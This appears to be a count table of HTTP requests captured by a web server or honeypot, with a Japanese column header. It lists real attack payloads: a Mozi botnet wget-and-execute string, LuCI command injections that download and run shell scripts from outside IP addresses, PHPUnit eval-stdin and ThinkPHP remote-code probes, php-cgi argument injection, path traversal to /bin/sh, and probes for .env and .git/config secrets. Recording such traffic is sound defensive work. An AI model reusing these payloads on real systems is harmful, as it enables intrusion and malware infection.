件数	Method	Request	Protocol
1		`27;wget%20http[:]//%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$`	HTTP/1.0
2		`\x16\x03\x01\x01$\x01`
1		`\x16\x03\x01\x01\v\x01`
2		`\x16\x03\x01\x01\x18\x01`
1		`\x16\x03\x01\x01\xfb\x01`
16		`\x16\x03\x01`
3		`\x16\x03\x02\x01o\x01`
26	GET	`/.env`	HTTP/1.1
1	GET	`/.env`	HTTP/1.0
4	GET	`/.git/config`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
2	GET	`/HNAP1`	HTTP/1.1
2	GET	`/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
6	GET	`/admin/assets/js/views/login.js`	HTTP/1.0
2	GET	`/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/boaform/admin/formLogin?username=user&psd=user`	HTTP/1.0
1	GET	`/cdn-cgi/trace`	HTTP/1.1
2	GET	`/cgi-bin/authLogin.cgi`	HTTP/1.1
1	GET	`/cgi-bin/index.cgi`	HTTP/1.1
9	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154[.]216[.]19[.]10%3A88%2Ft%7Csh%3B%60)`	HTTP/1.1
1	GET	`/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F45[.]82[.]120[.]118%2F1%2F1.sh%3B+chmod+777+1[.]sh%3B+.%2F1.sh%3B%60)`	HTTP/1.1
18	GET	`/cgi-bin/luci/;stok=/locale`	HTTP/1.1
2	GET	`/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
2	GET	`/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/druid/index.html`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
2	GET	`/evox/about`	HTTP/1.1
12	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/image/lgbg.jpg`	HTTP/1.1
2	GET	`/index.php?lang=../../../../../../../../tmp/index1`	HTTP/1.1
2	GET	`/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\"hi\"));?>+/tmp/index1.php`	HTTP/1.1
2	GET	`/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
2	GET	`/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/login.rsp`	HTTP/1.1
1	GET	`/odinhttpcall1725637260`	HTTP/1.1
1	GET	`/odinhttpcall1725639952`	HTTP/1.1
2	GET	`/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello`	HTTP/1.1
2	GET	`/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/query?q=SHOW+DIAGNOSTICS`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
2	GET	`/solr/admin/cores?action=STATUS&wt=json`	HTTP/1.1
2	GET	`/solr/admin/info/system`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
2	GET	`/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/v2/_catalog`	HTTP/1.1
2	GET	`/vendor/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/LICENSE/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/webui/`	HTTP/1.1
2	GET	`/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	GET	`/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
2	HEAD	`/`	HTTP/1.1
1	POST	`/HNAP1/`	HTTP/1.0
2	POST	`/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh`	HTTP/1.1
2	POST	`/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh`	HTTP/1.1
2	POST	`/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input`	HTTP/1.1
2	POST	`/login.html`	HTTP/1.1
1	POST	`/php-cgi/php-cgi.exe?%ADd+cgi[.]force_redirect%3D0+%ADd+disable_functions%3D\"\"+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input`	HTTP/1.1
2	POST	`/sdk`	HTTP/1.1
3	PRI	`*`	HTTP/2.0